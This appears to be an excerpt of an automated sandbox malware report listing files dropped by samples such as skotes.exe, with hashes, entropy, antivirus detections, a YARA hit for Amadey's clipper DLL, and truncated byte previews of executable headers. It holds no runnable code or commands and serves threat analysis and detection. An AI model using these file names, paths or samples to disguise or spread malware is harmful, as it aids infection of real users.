                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe
                                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4017
                                                                                                                                                                                                                                                            Entropy (8bit):5.365271649872934
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:iqbYqGSI6ou/fmOYqSqtzHeqKksvoqdqZ4UqqI9m1RWQvqh:iqbYqGcn/uHqXtzHeqKksvoqdqZrqqxQ
                                                                                                                                                                                                                                                            MD5:5AE8E4F3A04541A6E49A025DC877C086
                                                                                                                                                                                                                                                            SHA1:7369D60293F7DEEC11B8181B5E527148CE7F2F5F
                                                                                                                                                                                                                                                            SHA-256:5262E4D29ECBC33479F0F64EC5F90AEC90055A3FC90DAAC8DDFAF7B30E5336B0
                                                                                                                                                                                                                                                            SHA-512:FDDCB3BE9DF19ABD547A53BE3F6202DFBDBD94A362EC5D03ECC083846E75467C54682C769F41B2E99D95CD49F6F662D03B2A890FC764765EE975172088BB8F88
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe
                                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):226
                                                                                                                                                                                                                                                            Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):1058
                                                                                                                                                                                                                                                            Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                                                            MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                                                            SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                                                            SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                                                            SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):242176
                                                                                                                                                                                                                                                            Entropy (8bit):6.47050397947197
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                                                                                                                                                            MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                                                                                                                                                            SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                                                                                                                                                            SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                                                                                                                                                                                                            SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:V:V
                                                                                                                                                                                                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:0
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2668544
                                                                                                                                                                                                                                                            Entropy (8bit):6.1024828899386625
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
                                                                                                                                                                                                                                                            MD5:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                                                            SHA1:55B64EE8B2D1302581AB1978E9588191E4E62F81
                                                                                                                                                                                                                                                            SHA-256:98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
                                                                                                                                                                                                                                                            SHA-512:7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.Gra.)!a.)!a.)!.** l.)!.*, ..)!.*- r.)!p-* s.)!p-- q.)!p-, G.)!.*( d.)!a.(!?.)!.-! `.)!.-.!`.)!.-+ `.)!Richa.)!................PE..L.....eg...............*..&.........P.#.......&...@...........................).......(...@...................................'.<.....'.}.....................(..j....'.T...........................@.'.@.............&.@............................text.....&.......&................. ..`.rdata..,.....&.......&.............@..@.data.........'.......'.............@....fptable......'.......'.............@....rsrc...}.....'.......'.............@..@.reloc...j....(..l...L(.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1947648
                                                                                                                                                                                                                                                            Entropy (8bit):7.9407762641143576
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:mOVT4qvFY24PXkCq+p1Y4+B3E5Al22vakD5GrrpnFnzg0UE6C:mov624PUCq++3E5Al2/Fnzg0/
                                                                                                                                                                                                                                                            MD5:87448823DAB50A9EDD9F481B99ACA4EE
                                                                                                                                                                                                                                                            SHA1:2711209DA94D4E33D7A6636FE1A797FBA552002C
                                                                                                                                                                                                                                                            SHA-256:4C813BFF7644E8B3DB0C1F15DB3EAE43BA2CA5BADF089EC028607C888164E539
                                                                                                                                                                                                                                                            SHA-512:37085C98CA976EF91631CC7D6B81BFCBF64F72443205D1DF2A35105A504878B0795D45057A3C82A1CBDDF0895D11DBA9FFC234FB13AFF14EB2DEF33EA449BF43
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@..........................@......|.......................................[.A.o.....@............................................................................................................. . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..)...A.....................@...uqowvfqu.....@k.....................@...prbaxlvy............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2752512
                                                                                                                                                                                                                                                            Entropy (8bit):6.467333490492652
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:2iF9SarxksWzSDiGBJ9wbSnL0QLFz9DGOJhKVk:9SaasWzSDiGBJ9wmnAQAOCVk
                                                                                                                                                                                                                                                            MD5:C682C12739CBB53B85334E649CF0B772
                                                                                                                                                                                                                                                            SHA1:D80E059A1162D937A09A3823022E749D5D7CDFF8
                                                                                                                                                                                                                                                            SHA-256:28EE82A1695D62F46CE43EE4EBD525806CDB508ED5F68DFE07113BD58B2587E3
                                                                                                                                                                                                                                                            SHA-512:937D7D84B5AF30D1788E958E8893195AD2E8ABD6D9640D2343C5E9DA199CEE67199B824A10965A20B6A77E61844FC6C0BB9D887630B7F6433364671EE507C6DC
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........@*.. ...`....@.. ........................*......v*...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...zrghudyy..)......p)..h..............@...fscodnir. ... *.......).............@....taggant.@...@*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):439296
                                                                                                                                                                                                                                                            Entropy (8bit):6.4903731089009495
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:v4RG6lx/9Njr18QlSfJy4FjMSkJCzDLGDWD:O9NtSTZMzmmD4
                                                                                                                                                                                                                                                            MD5:51FF79B406CB223DD49DD4C947EC97B0
                                                                                                                                                                                                                                                            SHA1:B9B0253480A1B6CBDD673383320FECAE5EFB3DCE
                                                                                                                                                                                                                                                            SHA-256:2E3A5DFA44D59681A60D78B8B08A1AF3878D8E270C02D7E31A0876A85EB42A7E
                                                                                                                                                                                                                                                            SHA-512:C2B8D15B0DC1B0846F39CE007BE2DEB41D5B6AE76AF90D618F29DA8691ED987C42F3C270F0EA7F4D10CBD2D3877118F4133803C9C965B6FF236FF8CFAFD9367C
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe, Author: Joe Security
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....3dg............................'.............@..........................0............@..................................E...................................E......8...............................@...............<............................text...j........................... ..`.rdata...H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):36016
                                                                                                                                                                                                                                                            Entropy (8bit):7.983926499838966
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:tCJpXgIqzFJfREOAev/Gp0/XlxqHNxGny8mewtOodJCDz3E:oJ9WR3Aev/20/VxqHNTBfd0D4
                                                                                                                                                                                                                                                            MD5:A293ABF92B1DE52DF77CBCA7C5D98DF2
                                                                                                                                                                                                                                                            SHA1:DD342D01A0AFA093092EB544D6D7AD50EFAC6E96
                                                                                                                                                                                                                                                            SHA-256:FAB35B6046CF4E853CB7FE432850DD29A459576E3C21D8B29B0B06211612B40E
                                                                                                                                                                                                                                                            SHA-512:C21186913AE669BAB9E6BC5BAFD8EDCA2A89894CF6B86E85D7BC9DD103BF064923201A06E8C7EFDF0ACFF5E3BF0C9CE8D9F0A726C1E4AC8D411BEAD5B3E7ED8D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...,...,.....y}.u....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:V:V
                                                                                                                                                                                                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:0
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):97296
                                                                                                                                                                                                                                                            Entropy (8bit):7.9982317718947025
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                                                                                                                                                                                                            MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                                                                                                                                                                                                            SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                                                                                                                                                                                                            SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                                                                                                                                                                                                            SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                                            Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                                                            MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                                            SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                                                            SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                                                            SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                                                            Reputation:unknown
